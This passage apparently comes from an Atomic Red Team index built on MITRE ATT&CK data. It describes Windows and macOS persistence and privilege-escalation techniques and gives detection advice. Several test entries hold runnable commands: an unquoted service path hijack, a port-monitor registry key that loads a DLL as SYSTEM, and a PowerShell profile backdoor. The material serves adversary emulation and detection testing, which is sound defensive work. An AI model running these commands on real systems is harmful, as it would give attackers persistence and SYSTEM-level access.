when performing path interception: unquoted paths, path environment variable misconfigurations, and search order hijacking. The first vulnerability deals with full program paths, while the second and third occur when program paths are not specified. These techniques can be used for persistence if executables are called on a regular basis, as well as privilege escalation if intercepted executables are started by a higher privileged process. 
- - ### Unquoted Paths - Service paths (stored in Windows Registry keys) (Citation: Microsoft Subkey) and shortcut paths are vulnerable to path interception if the path has one or more spaces and is not surrounded by quotation marks (e.g., C:\unsafe path with space\program.exe vs. "C:\safe path with space\program.exe"). (Citation: Baggett 2012) An adversary can place an executable in a higher level directory of the path, and Windows will resolve that executable instead of the intended executable. For example, if the path in a shortcut is C:\program files\myapp.exe, an adversary may create a program at C:\program.exe that will be run instead of the intended program. (Citation: SecurityBoulevard Unquoted Services APR 2018) (Citation: SploitSpren Windows Priv Jan 2018) - - ### PATH Environment Variable Misconfiguration - The PATH environment variable contains a list of directories. Certain methods of executing a program (namely using cmd.exe or the command-line) rely solely on the PATH environment variable to determine the locations that are searched for a program when the path for the program is not given. If any directories are listed in the PATH environment variable before the Windows directory, %SystemRoot%\system32 (e.g., C:\Windows\system32), a program may be placed in the preceding directory that is named the same as a Windows program (such as cmd, PowerShell, or Python), which will be executed when that command is executed from a script or command-line. - - For example, if C:\example path precedes C:\Windows\system32 is in the PATH environment variable, a program that is named net.exe and placed in C:\example path will be called instead of the Windows system "net" when "net" is executed from the command-line. - - ### Search Order Hijacking - Search order hijacking occurs when an adversary abuses the order in which Windows searches for programs that are not given a path. The search order differs depending on the method that is used to execute the program. 
(Citation: Microsoft CreateProcess) (Citation: Hill NT Shell) (Citation: Microsoft WinExec) However, it is common for Windows to search in the directory of the initiating program before searching through the Windows system directory. An adversary who finds a program vulnerable to search order hijacking (i.e., a program that does not specify the path to an executable) may take advantage of this vulnerability by creating a program named after the improperly specified program and placing it within the initiating program's directory. - - For example, "example.exe" runs "cmd.exe" with the command-line argument net user. An adversary may place a program called "net.exe" within the same directory as example.exe, "net.exe" will be run instead of the Windows system utility net. In addition, if an adversary places a program called "net.com" in the same directory as "net.exe", then cmd.exe /C net user will execute "net.com" instead of "net.exe" due to the order of executable extensions defined under PATHEXT. (Citation: MSDN Environment Property) - - Search order hijacking is also a common practice for hijacking DLL loads and is covered in [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1038). - external_references: - - source_name: mitre-attack - external_id: T1034 - url: https://attack.mitre.org/techniques/T1034 - - external_id: CAPEC-159 - source_name: capec - url: https://capec.mitre.org/data/definitions/159.html - - url: https://blogs.technet.microsoft.com/srd/2014/04/08/ms14-019-fixing-a-binary-hijacking-via-cmd-or-bat-file/ - description: Nagaraju, S. (2014, April 8). MS14-019 – Fixing a binary hijacking - via .cmd or .bat file. Retrieved July 25, 2016. - source_name: TechNet MS14-019 - - url: http://support.microsoft.com/KB/103000 - description: Microsoft. (n.d.). CurrentControlSet\Services Subkey Entries. - Retrieved November 30, 2014. 
- source_name: Microsoft Subkey - - url: https://isc.sans.edu/diary/Help+eliminate+unquoted+path+vulnerabilities/14464 - description: Baggett, M. (2012, November 8). Help eliminate unquoted path - vulnerabilities. Retrieved December 4, 2014. - source_name: Baggett 2012 - - url: https://securityboulevard.com/2018/04/windows-privilege-escalation-unquoted-services/ - description: HackHappy. (2018, April 23). Windows Privilege Escalation – Unquoted - Services. Retrieved August 10, 2018. - source_name: SecurityBoulevard Unquoted Services APR 2018 - - url: https://www.sploitspren.com/2018-01-26-Windows-Privilege-Escalation-Guide/ - description: McFarland, R. (2018, January 26). Windows Privilege Escalation - Guide. Retrieved August 10, 2018. - source_name: SploitSpren Windows Priv Jan 2018 - - url: http://msdn.microsoft.com/en-us/library/ms682425 - description: Microsoft. (n.d.). CreateProcess function. Retrieved December - 5, 2014. - source_name: Microsoft CreateProcess - - url: http://technet.microsoft.com/en-us/library/cc723564.aspx#XSLTsection127121120120 - description: Hill, T. (n.d.). Windows NT Command Shell. Retrieved December - 5, 2014. - source_name: Hill NT Shell - - url: http://msdn.microsoft.com/en-us/library/ms687393 - description: Microsoft. (n.d.). WinExec function. Retrieved December 5, 2014. - source_name: Microsoft WinExec - - url: https://msdn.microsoft.com/en-us/library/fd7hxfdd.aspx - description: Microsoft. (n.d.). Environment Property. Retrieved July 27, 2016. 
- source_name: MSDN Environment Property - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - revoked: false - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - modified: '2020-07-06T18:49:35.645Z' - created: '2017-05-31T21:30:36.140Z' - x_mitre_is_subtechnique: false - x_mitre_platforms: - - Windows - x_mitre_permissions_required: - - User - - Administrator - - SYSTEM - x_mitre_effective_permissions: - - User - - Administrator - - SYSTEM - x_mitre_detection: "Monitor file creation for files named after partial directories - and in locations that may be searched for common processes through the environment - variable, or otherwise should not be user writable. Monitor the executing - process for process executable paths that are named for partial directories. - Monitor file creation for programs that are named after Windows system programs - or programs commonly executed without a path (such as \"findstr,\" \"net,\" - and \"python\"). If this activity occurs outside of known administration activity, - upgrades, installations, or patches, then it may be suspicious. \n\nData and - events should not be viewed in isolation, but as part of a chain of behavior - that could lead to other activities, such as network connections made for - Command and Control, learning details about the environment through Discovery, - and Lateral Movement." 
- x_mitre_contributors: - - Stefan Kanthak - x_mitre_data_sources: - - File monitoring - - Process monitoring - x_mitre_version: '1.0' - x_mitre_deprecated: true - atomic_tests: [] - T1574.007: - technique: - created: '2020-03-13T14:10:43.424Z' - modified: '2020-09-16T16:56:34.583Z' - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - - kill_chain_name: mitre-attack - phase_name: defense-evasion - type: attack-pattern - external_references: - - source_name: mitre-attack - external_id: T1574.007 - url: https://attack.mitre.org/techniques/T1574/007 - - external_id: CAPEC-13 - source_name: capec - url: https://capec.mitre.org/data/definitions/13.html - - external_id: CAPEC-38 - source_name: capec - url: https://capec.mitre.org/data/definitions/38.html - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Path Interception by PATH Environment Variable - description: |- - Adversaries may execute their own malicious payloads by hijacking environment variables used to load libraries. Adversaries may place a program in an earlier entry in the list of directories stored in the PATH environment variable, which Windows will then execute when it searches sequentially through that PATH listing in search of the binary that was called from a script or the command line. - - The PATH environment variable contains a list of directories. Certain methods of executing a program (namely using cmd.exe or the command-line) rely solely on the PATH environment variable to determine the locations that are searched for a program when the path for the program is not given. 
If any directories are listed in the PATH environment variable before the Windows directory, %SystemRoot%\system32 (e.g., C:\Windows\system32), a program may be placed in the preceding directory that is named the same as a Windows program (such as cmd, PowerShell, or Python), which will be executed when that command is executed from a script or command-line. - - For example, if C:\example path precedes C:\Windows\system32 is in the PATH environment variable, a program that is named net.exe and placed in C:\example path will be called instead of the Windows system "net" when "net" is executed from the command-line. - id: attack-pattern--0c2d00da-7742-49e7-9928-4514e5075d32 - x_mitre_defense_bypassed: - - Application control - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_detection: |- - Monitor file creation for files named after partial directories and in locations that may be searched for common processes through the environment variable, or otherwise should not be user writable. Monitor the executing process for process executable paths that are named for partial directories. Monitor file creation for programs that are named after Windows system programs or programs commonly executed without a path (such as "findstr," "net," and "python"). If this activity occurs outside of known administration activity, upgrades, installations, or patches, then it may be suspicious. - - Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement. 
- x_mitre_data_sources: - - Process monitoring - - File monitoring - x_mitre_contributors: - - Stefan Kanthak - x_mitre_platforms: - - Windows - atomic_tests: [] - T1574.008: - technique: - id: attack-pattern--58af3705-8740-4c68-9329-ec015a7013c2 - description: |- - Adversaries may execute their own malicious payloads by hijacking the search order used to load other programs. Because some programs do not call other programs using the full path, adversaries may place their own file in the directory where the calling program is located, causing the operating system to launch their malicious software at the request of the calling program. - - Search order hijacking occurs when an adversary abuses the order in which Windows searches for programs that are not given a path. Unlike [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), the search order differs depending on the method that is used to execute the program. (Citation: Microsoft CreateProcess) (Citation: Windows NT Command Shell) (Citation: Microsoft WinExec) However, it is common for Windows to search in the directory of the initiating program before searching through the Windows system directory. An adversary who finds a program vulnerable to search order hijacking (i.e., a program that does not specify the path to an executable) may take advantage of this vulnerability by creating a program named after the improperly specified program and placing it within the initiating program's directory. - - For example, "example.exe" runs "cmd.exe" with the command-line argument net user. An adversary may place a program called "net.exe" within the same directory as example.exe, "net.exe" will be run instead of the Windows system utility net. In addition, if an adversary places a program called "net.com" in the same directory as "net.exe", then cmd.exe /C net user will execute "net.com" instead of "net.exe" due to the order of executable extensions defined under PATHEXT. 
(Citation: Microsoft Environment Property) - - Search order hijacking is also a common practice for hijacking DLL loads and is covered in [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001). - name: Path Interception by Search Order Hijacking - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - external_references: - - source_name: mitre-attack - external_id: T1574.008 - url: https://attack.mitre.org/techniques/T1574/008 - - external_id: CAPEC-159 - source_name: capec - url: https://capec.mitre.org/data/definitions/159.html - - url: http://msdn.microsoft.com/en-us/library/ms682425 - description: Microsoft. (n.d.). CreateProcess function. Retrieved December - 5, 2014. - source_name: Microsoft CreateProcess - - source_name: Windows NT Command Shell - url: https://docs.microsoft.com/en-us/previous-versions//cc723564(v=technet.10)?redirectedfrom=MSDN#XSLTsection127121120120 - description: Tim Hill. (2014, February 2). The Windows NT Command Shell. Retrieved - December 5, 2014. - - url: http://msdn.microsoft.com/en-us/library/ms687393 - description: Microsoft. (n.d.). WinExec function. Retrieved December 5, 2014. - source_name: Microsoft WinExec - - source_name: Microsoft Environment Property - url: https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN - description: Microsoft. (2011, October 24). Environment Property. Retrieved - July 27, 2016. 
- type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - - kill_chain_name: mitre-attack - phase_name: defense-evasion - modified: '2020-09-17T19:03:35.217Z' - created: '2020-03-13T17:48:58.999Z' - x_mitre_platforms: - - Windows - x_mitre_contributors: - - Stefan Kanthak - x_mitre_data_sources: - - Process monitoring - - File monitoring - x_mitre_detection: | - Monitor file creation for files named after partial directories and in locations that may be searched for common processes through the environment variable, or otherwise should not be user writable. Monitor the executing process for process executable paths that are named for partial directories. Monitor file creation for programs that are named after Windows system programs or programs commonly executed without a path (such as "findstr," "net," and "python"). If this activity occurs outside of known administration activity, upgrades, installations, or patches, then it may be suspicious. - - Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement. 
- x_mitre_permissions_required: - - Administrator - - User - - SYSTEM - x_mitre_effective_permissions: - - Administrator - - SYSTEM - - User - x_mitre_is_subtechnique: true - x_mitre_version: '1.0' - atomic_tests: [] - T1574.009: - technique: - external_references: - - source_name: mitre-attack - external_id: T1574.009 - url: https://attack.mitre.org/techniques/T1574/009 - - external_id: CAPEC-38 - source_name: capec - url: https://capec.mitre.org/data/definitions/38.html - - source_name: Microsoft CurrentControlSet Services - url: https://docs.microsoft.com/en-us/windows-hardware/drivers/install/hklm-system-currentcontrolset-services-registry-tree - description: Microsoft. (2017, April 20). HKLM\SYSTEM\CurrentControlSet\Services - Registry Tree. Retrieved March 16, 2020. - - source_name: Help eliminate unquoted path - url: https://isc.sans.edu/diary/Help+eliminate+unquoted+path+vulnerabilities/14464 - description: Mark Baggett. (2012, November 8). Help eliminate unquoted path - vulnerabilities. Retrieved November 8, 2012. - - source_name: Windows Unquoted Services - url: https://securityboulevard.com/2018/04/windows-privilege-escalation-unquoted-services/ - description: HackHappy. (2018, April 23). Windows Privilege Escalation – Unquoted - Services. Retrieved August 10, 2018. - - source_name: Windows Privilege Escalation Guide - url: https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/ - description: absolomb. (2018, January 26). Windows Privilege Escalation Guide. - Retrieved August 10, 2018. - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Path Interception by Unquoted Path - description: |- - Adversaries may execute their own malicious payloads by hijacking vulnerable file path references. 
Adversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch. - - Service paths (Citation: Microsoft CurrentControlSet Services) and shortcut paths may also be vulnerable to path interception if the path has one or more spaces and is not surrounded by quotation marks (e.g., C:\unsafe path with space\program.exe vs. "C:\safe path with space\program.exe"). (Citation: Help eliminate unquoted path) (stored in Windows Registry keys) An adversary can place an executable in a higher level directory of the path, and Windows will resolve that executable instead of the intended executable. For example, if the path in a shortcut is C:\program files\myapp.exe, an adversary may create a program at C:\program.exe that will be run instead of the intended program. (Citation: Windows Unquoted Services) (Citation: Windows Privilege Escalation Guide) - - This technique can be used for persistence if executables are called on a regular basis, as well as privilege escalation if intercepted executables are started by a higher privileged process. - id: attack-pattern--bf96a5a3-3bce-43b7-8597-88545984c07b - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - - kill_chain_name: mitre-attack - phase_name: defense-evasion - modified: '2020-09-17T19:05:23.755Z' - created: '2020-03-13T13:51:58.519Z' - x_mitre_version: '1.1' - x_mitre_is_subtechnique: true - x_mitre_detection: |- - Monitor file creation for files named after partial directories and in locations that may be searched for common processes through the environment variable, or otherwise should not be user writable. Monitor the executing process for process executable paths that are named for partial directories. 
Monitor file creation for programs that are named after Windows system programs or programs commonly executed without a path (such as "findstr," "net," and "python"). If this activity occurs outside of known administration activity, upgrades, installations, or patches, then it may be suspicious. - - Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement. - x_mitre_data_sources: - - Process monitoring - - File monitoring - x_mitre_contributors: - - Stefan Kanthak - x_mitre_platforms: - - Windows - identifier: T1574.009 - atomic_tests: - - name: Execution of program.exe as service with unquoted service path - auto_generated_guid: 2770dea7-c50f-457b-84c4-c40a47460d9f - description: | - When a service is created whose executable path contains spaces and isn’t enclosed within quotes, leads to a vulnerability - known as Unquoted Service Path which allows a user to gain SYSTEM privileges. - In this case, if an executable program.exe in C:\ exists, C:\program.exe will be executed instead of test.exe in C:\Program Files\subfolder\test.exe. 
- supported_platforms: - - windows - input_arguments: - service_executable: - description: Path of the executable used for the service and as the hijacked - program.exe - type: path - default: PathToAtomicsFolder\T1574.009\bin\WindowsServiceExample.exe - executor: - command: | - copy #{service_executable} "C:\Program Files\windows_service.exe" - copy #{service_executable} "C:\program.exe" - sc create "Example Service" binpath= "C:\Program Files\windows_service.exe" Displayname= "Example Service" start= auto - sc start "Example Service" - cleanup_command: | - sc stop "Example Service" >nul 2>&1 - sc delete "Example Service" >nul 2>&1 - del "C:\Program Files\windows_service.exe" >nul 2>&1 - del "C:\program.exe" >nul 2>&1 - del "C:\Time.log" >nul 2>&1 - name: command_prompt - elevation_required: true - T1547.011: - technique: - created: '2020-01-24T20:02:59.149Z' - modified: '2020-06-20T19:57:36.136Z' - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - type: attack-pattern - id: attack-pattern--6747daa2-3533-4e78-8fb8-446ebb86448a - description: "Adversaries may modify plist files to run a program during system - boot or user login. Property list (plist) files contain all of the information - that macOS and OS X uses to configure applications and services. These files - are UTF-8 encoded and formatted like XML documents via a series of keys surrounded - by < >. They detail when programs should execute, file paths to the executables, - program arguments, required OS permissions, and many others. plists are located - in certain locations depending on their purpose such as /Library/Preferences - (which execute with elevated privileges) and ~/Library/Preferences - (which execute with a user's privileges). \n\nAdversaries can modify plist - files to execute their code as part of establishing persistence. 
plists may - also be used to elevate privileges since they may execute in the context of - another user.(Citation: Sofacy Komplex Trojan) \n\nA specific plist used for - execution at login is com.apple.loginitems.plist.(Citation: Methods - of Mac Malware Persistence) Applications under this plist run under the logged - in user's context, and will be started every time the user logs in. Login - items installed using the Service Management Framework are not visible in - the System Preferences and can only be removed by the application that created - them.(Citation: Adding Login Items) Users have direct control over login items - installed using a shared file list which are also visible in System Preferences - (Citation: Adding Login Items). Some of these applications can open visible - dialogs to the user, but they don’t all have to since there is an option to - \"hide\" the window. If an adversary can register their own login item or - modified an existing one, then they can use it to execute their code for a - persistence mechanism each time the user logs in (Citation: Malware Persistence - on OS X) (Citation: OSX.Dok Malware). The API method SMLoginItemSetEnabled - can be used to set Login Items, but scripting languages like [AppleScript](https://attack.mitre.org/techniques/T1059/002) - can do this as well. (Citation: Adding Login Items)" - name: Plist Modification - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - external_references: - - source_name: mitre-attack - external_id: T1547.011 - url: https://attack.mitre.org/techniques/T1547/011 - - url: https://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/ - description: Dani Creus, Tyler Halfpop, Robert Falcone. (2016, September 26). - Sofacy's 'Komplex' OS X Trojan. Retrieved July 8, 2017. 
- source_name: Sofacy Komplex Trojan - - url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf - description: Patrick Wardle. (2014, September). Methods of Malware Persistence - on Mac OS X. Retrieved July 5, 2017. - source_name: Methods of Mac Malware Persistence - - url: https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLoginItems.html - description: Apple. (2016, September 13). Adding Login Items. Retrieved July - 11, 2017. - source_name: Adding Login Items - - url: https://www.rsaconference.com/writable/presentations/file_upload/ht-r03-malware-persistence-on-os-x-yosemite_final.pdf - description: Patrick Wardle. (2015). Malware Persistence on OS X Yosemite. - Retrieved July 10, 2017. - source_name: Malware Persistence on OS X - - url: https://blog.malwarebytes.com/threat-analysis/2017/04/new-osx-dok-malware-intercepts-web-traffic/ - description: Thomas Reed. (2017, July 7). New OSX.Dok malware intercepts web - traffic. Retrieved July 10, 2017. - source_name: OSX.Dok Malware - x_mitre_platforms: - - macOS - x_mitre_data_sources: - - File monitoring - - Process monitoring - - Process command-line parameters - x_mitre_detection: |- - File system monitoring can determine if plist files are being modified. Users should not have permission to modify these in most cases. Some software tools like "Knock Knock" can detect persistence mechanisms and point to the specific files that are being referenced. This can be helpful to see what is actually being executed. - - All the login items created via shared file lists are viewable by going to the Apple menu -> System Preferences -> Users & Groups -> Login items. This area (and the corresponding file locations) should be monitored and allowed for known good applications. 
Otherwise, Login Items are located in Contents/Library/LoginItems within an application bundle, so these paths should be monitored as well.(Citation: Adding Login Items) - - Monitor process execution for abnormal process execution resulting from modified plist files. Monitor utilities used to modify plist files or that take a plist file as an argument, which may indicate suspicious activity. - x_mitre_permissions_required: - - User - - Administrator - x_mitre_is_subtechnique: true - x_mitre_version: '1.0' - identifier: T1547.011 - atomic_tests: - - name: Plist Modification - auto_generated_guid: 394a538e-09bb-4a4a-95d1-b93cf12682a8 - description: 'Modify MacOS plist file in one of two directories - -' - supported_platforms: - - macos - executor: - steps: | - 1. Modify a .plist in - - /Library/Preferences - - OR - - ~/Library/Preferences - - 2. Subsequently, follow the steps for adding and running via [Launch Agent](Persistence/Launch_Agent.md) - name: manual - T1205.001: - technique: - external_references: - - source_name: mitre-attack - external_id: T1205.001 - url: https://attack.mitre.org/techniques/T1205/001 - - url: https://www.giac.org/paper/gcih/342/handle-cd00r-invisible-backdoor/103631 - description: 'Hartrell, Greg. (2002, August). Get a handle on cd00r: The invisible - backdoor. Retrieved October 13, 2018.' - source_name: Hartrell cd00r 2002 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Port Knocking - description: |- - Adversaries may use port knocking to hide open ports used for persistence or command and control. To enable a port, an adversary sends a series of attempted connections to a predefined sequence of closed ports. After the sequence is completed, opening a port is often accomplished by the host based firewall, but could also be implemented by custom software. 
- - This technique has been observed to both for the dynamic opening of a listening port as well as the initiating of a connection to a listening server on a different system. - - The observation of the signal packets to trigger the communication can be conducted through different methods. One means, originally implemented by Cd00r (Citation: Hartrell cd00r 2002), is to use the libpcap libraries to sniff for the packets in question. Another method leverages raw sockets, which enables the malware to use ports that are already open for use by other programs. - id: attack-pattern--8868cb5b-d575-4a60-acb2-07d37389a2fd - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: defense-evasion - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: command-and-control - modified: '2020-10-21T01:26:31.804Z' - created: '2020-07-01T18:23:25.002Z' - x_mitre_version: '1.1' - x_mitre_is_subtechnique: true - x_mitre_permissions_required: - - User - x_mitre_detection: Record network packets sent to and from the system, looking - for extraneous packets that do not belong to established flows. - x_mitre_data_sources: - - Netflow/Enclave netflow - - Packet capture - x_mitre_platforms: - - Linux - - macOS - - Windows - - Network - atomic_tests: [] - T1547.010: - technique: - external_references: - - source_name: mitre-attack - external_id: T1547.010 - url: https://attack.mitre.org/techniques/T1547/010 - - url: http://msdn.microsoft.com/en-us/library/dd183341 - description: Microsoft. (n.d.). AddMonitor function. Retrieved November 12, - 2014. - source_name: AddMonitor - - url: https://www.defcon.org/images/defcon-22/dc-22-presentations/Bloxham/DEFCON-22-Brady-Bloxham-Windows-API-Abuse-UPDATED.pdf - description: Bloxham, B. (n.d.). Getting Windows to Play with Itself [PowerPoint - slides]. Retrieved November 12, 2014. 
- source_name: Bloxham - - url: https://technet.microsoft.com/en-us/sysinternals/bb963902 - description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. - Retrieved June 6, 2016. - source_name: TechNet Autoruns - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Port Monitors - description: "Adversaries may use port monitors to run an attacker supplied - DLL during system boot for persistence or privilege escalation. A port monitor - can be set through the AddMonitor API call to set a DLL to be - loaded at startup. (Citation: AddMonitor) This DLL can be located in C:\\Windows\\System32 - and will be loaded by the print spooler service, spoolsv.exe, on boot. The - spoolsv.exe process also runs under SYSTEM level permissions. (Citation: Bloxham) - Alternatively, an arbitrary DLL can be loaded if permissions allow writing - a fully-qualified pathname for that DLL to HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Monitors. - \n\nThe Registry key contains entries for the following:\n\n* Local Port\n* - Standard TCP/IP Port\n* USB Monitor\n* WSD Port\n\nAdversaries can use this - technique to load malicious code at startup that will persist on system reboot - and execute as SYSTEM." - id: attack-pattern--43881e51-ac74-445b-b4c6-f9f9e9bf23fe - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - modified: '2020-01-24T19:46:27.750Z' - created: '2020-01-24T19:46:27.750Z' - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_effective_permissions: - - SYSTEM - x_mitre_permissions_required: - - SYSTEM - - Administrator - x_mitre_detection: "Monitor process API calls to AddMonitor.(Citation: - AddMonitor) Monitor DLLs that are loaded by spoolsv.exe for DLLs that are - abnormal. 
New DLLs written to the System32 directory that do not correlate - with known good software or patching may be suspicious. \n\nMonitor Registry - writes to HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Monitors. - Run the Autoruns utility, which checks for this Registry key as a persistence - mechanism (Citation: TechNet Autoruns)" - x_mitre_data_sources: - - File monitoring - - API monitoring - - DLL monitoring - - Windows Registry - - Process monitoring - x_mitre_contributors: - - Stefan Kanthak - - Travis Smith, Tripwire - x_mitre_platforms: - - Windows - identifier: T1547.010 - atomic_tests: - - name: Add Port Monitor persistence in Registry - auto_generated_guid: d34ef297-f178-4462-871e-9ce618d44e50 - description: Add key-value pair to a Windows Port Monitor registry. On the subsequent - reboot dll will be execute under spoolsv with NT AUTHORITY/SYSTEM privilege. - supported_platforms: - - windows - input_arguments: - monitor_dll: - description: Addition to port monitor registry key. Normally refers to a - DLL name in C:\Windows\System32. arbitrary DLL can be loaded if permissions - allow writing a fully-qualified pathname for that DLL. - type: Path - default: C:\Path\AtomicRedTeam.dll - executor: - command: 'reg add "hklm\system\currentcontrolset\control\print\monitors\ART" - /v "Atomic Red Team" /d "#{monitor_dll}" /t REG_SZ - -' - cleanup_command: 'reg delete "hklm\system\currentcontrolset\control\print\monitors\ART" - -' - name: command_prompt - elevation_required: true - T1546.013: - technique: - external_references: - - source_name: mitre-attack - external_id: T1546.013 - url: https://attack.mitre.org/techniques/T1546/013 - - source_name: Microsoft About Profiles - url: https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_profiles?view=powershell-6 - description: Microsoft. (2017, November 29). About Profiles. Retrieved June - 14, 2019. 
- - source_name: ESET Turla PowerShell May 2019 - url: https://www.welivesecurity.com/2019/05/29/turla-powershell-usage/ - description: Faou, M. and Dumont R.. (2019, May 29). A dive into Turla PowerShell - usage. Retrieved June 14, 2019. - - source_name: Wits End and Shady PowerShell Profiles - url: https://witsendandshady.blogspot.com/2019/06/lab-notes-persistence-and-privilege.html - description: 'DeRyke, A.. (2019, June 7). Lab Notes: Persistence and Privilege - Elevation using the Powershell Profile. Retrieved July 8, 2019.' - - url: http://www.malwarearchaeology.com/s/Windows-PowerShell-Logging-Cheat-Sheet-ver-June-2016-v2.pdf - description: Malware Archaeology. (2016, June). WINDOWS POWERSHELL LOGGING - CHEAT SHEET - Win 7/Win 2008 or later. Retrieved June 24, 2016. - source_name: Malware Archaeology PowerShell Cheat Sheet - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: PowerShell Profile - description: "Adversaries may gain persistence and elevate privileges by executing - malicious content triggered by PowerShell profiles. A PowerShell profile (profile.ps1) - is a script that runs when [PowerShell](https://attack.mitre.org/techniques/T1059/001) - starts and can be used as a logon script to customize user environments.\n\n[PowerShell](https://attack.mitre.org/techniques/T1059/001) - supports several profiles depending on the user or host program. For example, - there can be different profiles for [PowerShell](https://attack.mitre.org/techniques/T1059/001) - host programs such as the PowerShell console, PowerShell ISE or Visual Studio - Code. An administrator can also configure a profile that applies to all users - and host programs on the local computer. 
(Citation: Microsoft About Profiles) - \n\nAdversaries may modify these profiles to include arbitrary commands, functions, - modules, and/or [PowerShell](https://attack.mitre.org/techniques/T1059/001) - drives to gain persistence. Every time a user opens a [PowerShell](https://attack.mitre.org/techniques/T1059/001) - session the modified script will be executed unless the -NoProfile - flag is used when it is launched. (Citation: ESET Turla PowerShell May 2019) - \n\nAn adversary may also be able to escalate privileges if a script in a - PowerShell profile is loaded and executed by an account with higher privileges, - such as a domain administrator. (Citation: Wits End and Shady PowerShell Profiles)" - id: attack-pattern--0f2c410d-d740-4ed9-abb1-b8f4a7faf6c3 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - - kill_chain_name: mitre-attack - phase_name: persistence - modified: '2020-03-24T21:31:31.082Z' - created: '2020-01-24T15:11:02.758Z' - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_permissions_required: - - User - - Administrator - x_mitre_detection: |- - Locations where profile.ps1 can be stored should be monitored for new profiles or modifications. (Citation: Malware Archaeology PowerShell Cheat Sheet) Example profile locations include: - - * $PsHome\Profile.ps1 - * $PsHome\Microsoft.{HostProgram}_profile.ps1 - * $Home\My Documents\PowerShell\Profile.ps1 - * $Home\My Documents\PowerShell\Microsoft.{HostProgram}_profile.ps1 - - Monitor abnormal PowerShell commands, unusual loading of PowerShell drives or modules, and/or execution of unknown programs. 
- x_mitre_data_sources: - - PowerShell logs - - File monitoring - - Process command-line parameters - - Process monitoring - x_mitre_contributors: - - Allen DeRyke, ICE - x_mitre_platforms: - - Windows - identifier: T1546.013 - atomic_tests: - - name: Append malicious start-process cmdlet - auto_generated_guid: '090e5aa5-32b6-473b-a49b-21e843a56896' - description: 'Appends a start process cmdlet to the current user''s powershell - profile pofile that points to a malicious executable. Upon execution, calc.exe - will be launched. - -' - supported_platforms: - - windows - input_arguments: - exe_path: - description: Path the malicious executable - type: Path - default: calc.exe - ps_profile: - description: Powershell profile to use - type: String - default: "$profile" - dependency_executor_name: powershell - dependencies: - - description: 'Ensure a powershell profile exists for the current user - -' - prereq_command: 'if (Test-Path #{ps_profile}) {exit 0} else {exit 1} - -' - get_prereq_command: 'New-Item -Path #{ps_profile} -Type File -Force - -' - executor: - command: | - Add-Content #{ps_profile} -Value "" - Add-Content #{ps_profile} -Value "Start-Process #{exe_path}" - powershell -Command exit - cleanup_command: | - $oldprofile = cat $profile | Select-Object -skiplast 1 - Set-Content $profile -Value $oldprofile - name: powershell - T1542: - technique: - id: attack-pattern--7f0ca133-88c4-40c6-a62f-b3083a7fbc2e - description: |- - Adversaries may abuse Pre-OS Boot mechanisms as a way to establish persistence on a system. During the booting process of a computer, firmware and various startup services are loaded before the operating system. These programs control flow of execution before the operating 